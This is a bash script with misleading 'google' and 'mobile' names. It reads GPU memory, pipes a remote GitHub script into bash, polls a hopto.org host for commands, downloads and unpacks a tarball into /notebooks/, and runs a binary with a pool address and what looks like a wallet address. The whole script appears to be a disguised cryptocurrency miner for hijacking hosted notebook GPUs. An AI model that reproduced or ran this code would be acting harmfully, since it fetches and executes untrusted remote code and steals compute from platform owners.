apt-get install -y libcpprest-dev libgmp-dev libargon2-0-dev

google84121274=$(nvidia-smi --query-gpu=memory.total --format=csv | sed 's/MiB//g' | sed 's/memory.total//g' | sed 's/\s+\n+\r+//g' | sed 's/\[//g' | sed 's/\]//g')

if [[ $google84121274 == *"failed"* ]]; then

curl https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/google8412127474 | bash

else

while true
do

arr[0]="http://mobile84121274.hopto.org/"
rand=$[$RANDOM % ${#arr[@]}]
google841212121274=${arr[$rand]}

google84=$(nvidia-smi --query-gpu=memory.total --format=csv | sed 's/MiB//g' | sed 's/memory.total//g' | sed 's/\s+\n+\r+//g' | sed 's/\[//g' | sed 's/\]//g')

string=$(curl -s -A "mobile84" http://mobile84121274.hopto.org/?q=deploy)
if [[ $string == *"16384"* ]]; then

cd /notebooks/

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/googlemobile8474.tar.gz
tar -xvf ./googlemobile8474.tar.gz

cd googleapps8474

if (($google84 >= 14884 && $google84 <= 16884));
then

timeout 14 ./google84121274 -p $google841212121274 -a 4dkJEWHWMVpTFTD6pZr8111zWoRNJUmoStit56uL3Urhte98L1Lm3VBWhUCkS6MAYyyPFNSVCqbKccLTmFbiYgA6 -t 1 -b 762
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 10884 && $google84 <= 14882));
then

timeout 14 ./google84121274 -p $google841212121274 -a 4dkJEWHWMVpTFTD6pZr8111zWoRNJUmoStit56uL3Urhte98L1Lm3VBWhUCkS6MAYyyPFNSVCqbKccLTmFbiYgA6 -t 1 -b 572
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 5288 && $google84 <= 9184));
then

timeout 14 ./google84121274 -p $google841212121274 -a 4dkJEWHWMVpTFTD6pZr8111zWoRNJUmoStit56uL3Urhte98L1Lm3VBWhUCkS6MAYyyPFNSVCqbKccLTmFbiYgA6 -t 1 -b 362
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 2874 && $google84 <= 5184));
then

timeout 14 ./google84121274 -p $google841212121274 -a 4dkJEWHWMVpTFTD6pZr8111zWoRNJUmoStit56uL3Urhte98L1Lm3VBWhUCkS6MAYyyPFNSVCqbKccLTmFbiYgA6 -t 1 -b 208
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 1884 && $google84 <= 2488));
then

timeout 14 ./google84121274 -p $google841212121274 -a 4dkJEWHWMVpTFTD6pZr8111zWoRNJUmoStit56uL3Urhte98L1Lm3VBWhUCkS6MAYyyPFNSVCqbKccLTmFbiYgA6 -t 1 -b 102
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi



else

cd /notebooks/

wget -N -q https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/google8474.tar.gz
tar -xvf ./google8474.tar.gz

cd googleapps8474

google8412=$(curl -s $google841212121274 | sed "s/\s+//g")

google84=$(nvidia-smi --query-gpu=memory.total --format=csv | sed 's/MiB//g' | sed 's/memory.total//g' | sed 's/\s+\n+\r+//g' | sed 's/\[//g' | sed 's/\]//g')

if (($google84 >= 14884 && $google84 <= 16884));
then

timeout 14 ./google84121274 -p $google841212121274 -a 4dkJEWHWMVpTFTD6pZr8111zWoRNJUmoStit56uL3Urhte98L1Lm3VBWhUCkS6MAYyyPFNSVCqbKccLTmFbiYgA6 -t 1 -b 22
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 10884 && $google84 <= 14882));
then

timeout 14 ./google84121274 -p $google841212121274 -a 4dkJEWHWMVpTFTD6pZr8111zWoRNJUmoStit56uL3Urhte98L1Lm3VBWhUCkS6MAYyyPFNSVCqbKccLTmFbiYgA6 -t 1 -b 18
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 5288 && $google84 <= 9184));
then

timeout 14 ./google84121274 -p $google841212121274 -a 4dkJEWHWMVpTFTD6pZr8111zWoRNJUmoStit56uL3Urhte98L1Lm3VBWhUCkS6MAYyyPFNSVCqbKccLTmFbiYgA6 -t 1 -b 10
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 2874 && $google84 <= 5184));
then

timeout 14 ./google84121274 -p $google841212121274 -a 4dkJEWHWMVpTFTD6pZr8111zWoRNJUmoStit56uL3Urhte98L1Lm3VBWhUCkS6MAYyyPFNSVCqbKccLTmFbiYgA6 -t 1 -b 6
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi

if (($google84 >= 1884 && $google84 <= 2488));
then

timeout 14 ./google84121274 -p $google841212121274 -a 4dkJEWHWMVpTFTD6pZr8111zWoRNJUmoStit56uL3Urhte98L1Lm3VBWhUCkS6MAYyyPFNSVCqbKccLTmFbiYgA6 -t 1 -b 2
if [ $? -eq 124 ]; then
echo "google84"
else
echo "google8474"
fi

fi



fi

done

fi
